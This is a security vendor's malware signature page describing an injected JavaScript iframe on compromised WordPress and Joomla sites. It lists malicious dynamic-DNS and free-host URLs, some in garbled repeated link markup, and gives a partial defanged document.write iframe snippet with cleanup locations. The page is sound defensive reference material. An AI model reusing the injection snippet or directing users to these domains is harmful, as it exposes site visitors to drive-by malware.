mwjs-iframe-injected691

Description: A Remote and malicious iframe was identified. It uses javascript to generate the iframe dynamically on the browser of anyone visiting the compromised site.

We are seeing it often on outdated Joomla and WordPress sites.

<br /> <a href="http://cvrtyi.ddns.info/nighttrend.cgi?8"><a href="http://cvrtyi.ddns.info/nighttrend.cgi?8"><a href="http://cvrtyi.ddns.info/nighttrend.cgi?8"><a href="http://cvrtyi.ddns.info/nighttrend.cgi?8"><a href="http://cvrtyi.ddns.info/nighttrend.cgi?8"><a href="http://cvrtyi.ddns.info/nighttrend.cgi?8"><a href="http://cvrtyi.ddns.info/nighttrend.cgi?8"><a href="http://cvrtyi.ddns.info/nighttrend.cgi?8">http://cvrtyi.ddns.info/nighttrend.cgi?8</a></a></a></a></a></a></a></a><br /> <a href="http://byiegfs.ddns.info/nighttrend.cgi?8"><a href="http://byiegfs.ddns.info/nighttrend.cgi?8"><a href="http://byiegfs.ddns.info/nighttrend.cgi?8"><a href="http://byiegfs.ddns.info/nighttrend.cgi?8"><a href="http://byiegfs.ddns.info/nighttrend.cgi?8"><a href="http://byiegfs.ddns.info/nighttrend.cgi?8"><a href="http://byiegfs.ddns.info/nighttrend.cgi?8"><a href="http://byiegfs.ddns.info/nighttrend.cgi?8">http://byiegfs.ddns.info/nighttrend.cgi?8</a></a></a></a></a></a></a></a><br /> <a href="http://wstckewb.freewww.biz/nighttrend.cgi?8"><a href="http://wstckewb.freewww.biz/nighttrend.cgi?8"><a href="http://wstckewb.freewww.biz/nighttrend.cgi?8"><a href="http://wstckewb.freewww.biz/nighttrend.cgi?8"><a href="http://wstckewb.freewww.biz/nighttrend.cgi?8"><a href="http://wstckewb.freewww.biz/nighttrend.cgi?8"><a href="http://wstckewb.freewww.biz/nighttrend.cgi?8"><a href="http://wstckewb.freewww.biz/nighttrend.cgi?8">http://wstckewb.freewww.biz/nighttrend.cgi?8</a></a></a></a></a></a></a></a><br /> <a href="http://bthlzzfb.freewww.biz/goodday/fresh/modern_errors.php"><a href="http://bthlzzfb.freewww.biz/goodday/fresh/modern_errors.php"><a href="http://bthlzzfb.freewww.biz/goodday/fresh/modern_errors.php"><a href="http://bthlzzfb.freewww.biz/goodday/fresh/modern_errors.php"><a href="http://bthlzzfb.freewww.biz/goodday/fresh/modern_errors.php"><a href="http://bthlzzfb.freewww.biz/goodday/fresh/modern_errors.php"><a href="http://bthlzzfb.freewww.biz/goodday/fresh/modern_errors.php"><a href="http://bthlzzfb.freewww.biz/goodday/fresh/modern_errors.php">http://bthlzzfb.freewww.biz/goodday/fresh/modern_errors.php</a></a></a></a></a></a></a></a><br /> .. many others ..<br /> </code></pre> </p> <p><b>Affecting:</b> Any web site (most common on WordPress).</p> <p><b>Clean up:</b> Malware is hidden at the index.php, index.html or at the bottom of the .js files.</p> <p><b>Last update:</b> Dec/2012</p> <p><b>Malware dump:</b><br /> <br /><textarea rows="3" cols="70"><br /> ; document.write ("<iframe src=&quotlhttx://lmybv.ddns. name/nighttrend .cgi?8" ..<br /> </code></pre></p> </div><!-- .entry-content --> <footer class="entry-footer wedocs-entry-footer"> <div class="wedocs-article-author" itemprop="author" itemscope itemtype="https://schema.org/Person"> <meta itemprop="name" content="Rodrigo Escobar" /> <meta itemprop="url" content="https://labs.sucuri.net/author/rodrigo-escobar/" /> </div> <meta itemprop="datePublished" content="2019-05-16T00:00:00+00:00"/> <time itemprop="dateModified" datetime=""></time> </footer> <nav class="wedocs-doc-nav wedocs-hide-print"><h3 class="assistive-text screen-reader-text">Doc navigation</h3><span class="nav-prev"><a href="https://labs.sucuri.net/signatures/sitecheck/mwjs-include-bitly/">← mwjs-include-bitly</a></span><span class="nav-next"><a href="https://labs.sucuri.net/signatures/sitecheck/mwjs-include-images/">mwjs-include-images →</a></span></nav> </article><!-- #post-## --> </div><!-- .wedocs-single-content --> </div><!-- .wedocs-single-wrap --> </main><!-- .site-main --></div><!-- .content-area --> </div><!-- #content --> <footer id="n-footer"> <div id="mp-footer" class="container"> <div class="row"> <div class="c-lg-12"> <div class="row"> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-products"> <div class="footer-heading"> <p>Products</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-prod-wf auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/website-firewall/">Website Firewall</a></li> <li class="list-block-item"><a class="mp-ft-prod-av auto-track" data-gatrack="Button_Click, Footer_Website_Antivirus" href="https://sucuri.net/website-security-platform/">Website Security Platform</a></li> <li class="list-block-item"><a class="mp-ft-prod-bp auto-track" data-gatrack="Button_Click, Footer_Website_Backups" href="https://sucuri.net/website-backups/">Website Backups</a></li> <li class="list-block-item"><a class="mp-ft-prod-wps auto-track" data-gatrack="Button_Click, Footer_WordPress_Security" href="https://sucuri.net/wordpress-security/">WordPress Security</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track" data-gatrack="Button_Click, Footer_Enterprise_Services" href="https://sucuri.net/custom/enterprise/">Enterprise Services</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track d-none" data-gatrack="Button_Click, Top_Nav_Referrals" href="https://sucuri.net/referral/">Referral Program</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-solutions"> <div class="footer-heading"> <p>Solutions</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sol-ddos auto-track" data-gatrack="Button_Click, Footer_DDoS_Protection" href="https://sucuri.net/ddos-protection/">DDoS Protection</a></li> <li class="list-block-item"><a class="mp-ft-sol-scan auto-track" data-gatrack="Button_Click, Footer_Malware_Detection" href="https://sucuri.net/malware-detection-scanning/">Malware Detection</a></li> <li class="list-block-item"><a class="mp-ft-sol-removal auto-track" data-gatrack="Button_Click, Footer_Malware_Removal" href="https://sucuri.net/website-malware-removal/">Malware Removal</a></li> <li class="list-block-item"><a class="mp-ft-sol-prevent auto-track" data-gatrack="Button_Click, Footer_Malware_Prevention" href="https://sucuri.net/website-hack-protection/">Malware Prevention</a></li> <li class="list-block-item"><a class="mp-ft-sol-blacklist auto-track" data-gatrack="Button_Click, Footer_Blacklist-Removal" href="https://sucuri.net/website-security-platform/blocklist-removal-and-repair/">Blacklist Removal</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Support</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sup-kb auto-track" data-gatrack="Button_Click, Footer_Knowledge_Base" href="https://docs.sucuri.net/">Knowledge Base</a></li> <li class="list-block-item"><a class="mp-ft-sup-sc auto-track" data-gatrack="Button_Click, Footer_Sitecheck" href="https://sitecheck.sucuri.net/">SiteCheck</a></li> <li class="list-block-item"><a class="mp-ft-sup-lab auto-track" data-gatrack="Button_Click, Footer_Research_Labs" href="https://labs.sucuri.net/">Research Labs</a></li> <li class="list-block-item"><a class="mp-ft-sup-rep auto-track" data-gatrack="Button_Click, Footer_Report_Abuse" href="https://abuse.sucuri.net/">Report Abuse</a></li> <li class="list-block-item"><a class="mp-ft-sup-stat auto-track" data-gatrack="Button_Click, Footer_Report_Status" href="https://status.sucuri.net/">Status Report</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Company</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-comp-about auto-track" data-gatrack="Button_Click, Footer_About" href="https://sucuri.net/company/">About Sucuri</a></li> <li class="list-block-item"><a class="mp-ft-comp-contact auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/company/contact-us/">Contact</a></li> <li class="list-block-item"><a class="mp-ft-sup-blog auto-track" data-gatrack="Button_Click, Footer_Blog" href="https://blog.sucuri.net/">Blog</a></li> <li class="list-block-item"><a class="mp-ft-comp-employment auto-track" data-gatrack="Button_Click, Footer_Employment" href="https://sucuri.net/referral/">Referral</a></li> <li class="list-block-item"><a class="mp-ft-comp-testimonials auto-track" data-gatrack="Button_Click, Footer_Testimonials" href="https://sucuri.net/customers/">Testimonials</a></li> </ul> </div> </div> </div> </div> </div> <div class="c-lg-12 footer-b"> <hr> <div class="d-flex"> <div class="sucuri-logo-wrapper sucuri-logo"> <a href="/" title="Sucuri Security" class="mp-sucuri-logo auto-track mt-0"></a> </div> <div class="row flex-column m-0"> <div class="pl-50"> <ul class="list-inline unstyled-list mb-0"> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-terms auto-track" data-gatrack="Button_Click, Footer_Terms_Of_Use" href="https://sucuri.net/terms/">Terms of Use</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-priv auto-track" data-gatrack="Button_Click, Footer_Privacy_Policy" href="https://sucuri.net/privacy/">Privacy Policy</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-cook auto-track" data-gatrack="Button_Click, Footer_Cookie_Policy" href="https://sucuri.net/cookies/">Do Not Sell My Personal Information</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-faq auto-track" data-gatrack="Button_Click, Footer_FAQ" href="https://sucuri.net/faq/">Frequently Asked Questions</a></li> </ul> </div> <div class="copyright pl-50"> <p>© 2024 GoDaddy Mediatemple, Inc., d/b/a Sucuri. All rights reserved.</p> </div> </div> </div> </div> </div> <!-- /.container --> </div> </footer> </div><!-- #page --> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/plugins/wedocs/assets/js/anchor.min.js?ver=1.6.2' id='wedocs-anchorjs-js'></script> <script type='text/javascript' id='wedocs-scripts-js-extra'> /* <![CDATA[ */ var weDocs_Vars = {"ajaxurl":"https:\/\/labs.sucuri.net\/wp-admin\/admin-ajax.php","nonce":"4609165ee5","style":"https:\/\/labs.sucuri.net\/wp-content\/plugins\/wedocs\/assets\/css\/print.css","powered":"\u00a9 Sucuri Labs, 2024. Powered by weDocs<br>https:\/\/labs.sucuri.net"}; /* ]]> */ </script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/plugins/wedocs/assets/js/frontend.js?ver=1701723111' id='wedocs-scripts-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/navigation.js?ver=20151215' id='sucurikb-navigation-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/skip-link-focus-fix.js?ver=20151215' id='sucurikb-skip-link-focus-fix-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/foundation.min.js?ver=0.1' id='foundation-js-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/custom.js?ver=0.1' id='sucuri-wp-custom-js-js'></script> <script id="module-flowchart"> (function($) { $(function() { if (typeof $.fn.flowChart !== "undefined") { if ($(".language-flow").length > 0) { $(".language-flow").parent("pre").attr("style", "text-align: center; background: none;"); $(".language-flow").addClass("flowchart").removeClass("language-flow"); $(".flowchart").flowChart(); } } }); })(jQuery); </script> <script id="module-prism-line-number"> (function($) { $(function() { $("code").each(function() { var parent_div = $(this).parent("pre"); var pre_css = $(this).attr("class"); if (typeof pre_css !== "undefined" && -1 !== pre_css.indexOf("language-")) { parent_div.addClass("line-numbers"); } }); }); })(jQuery); </script> </body> </html>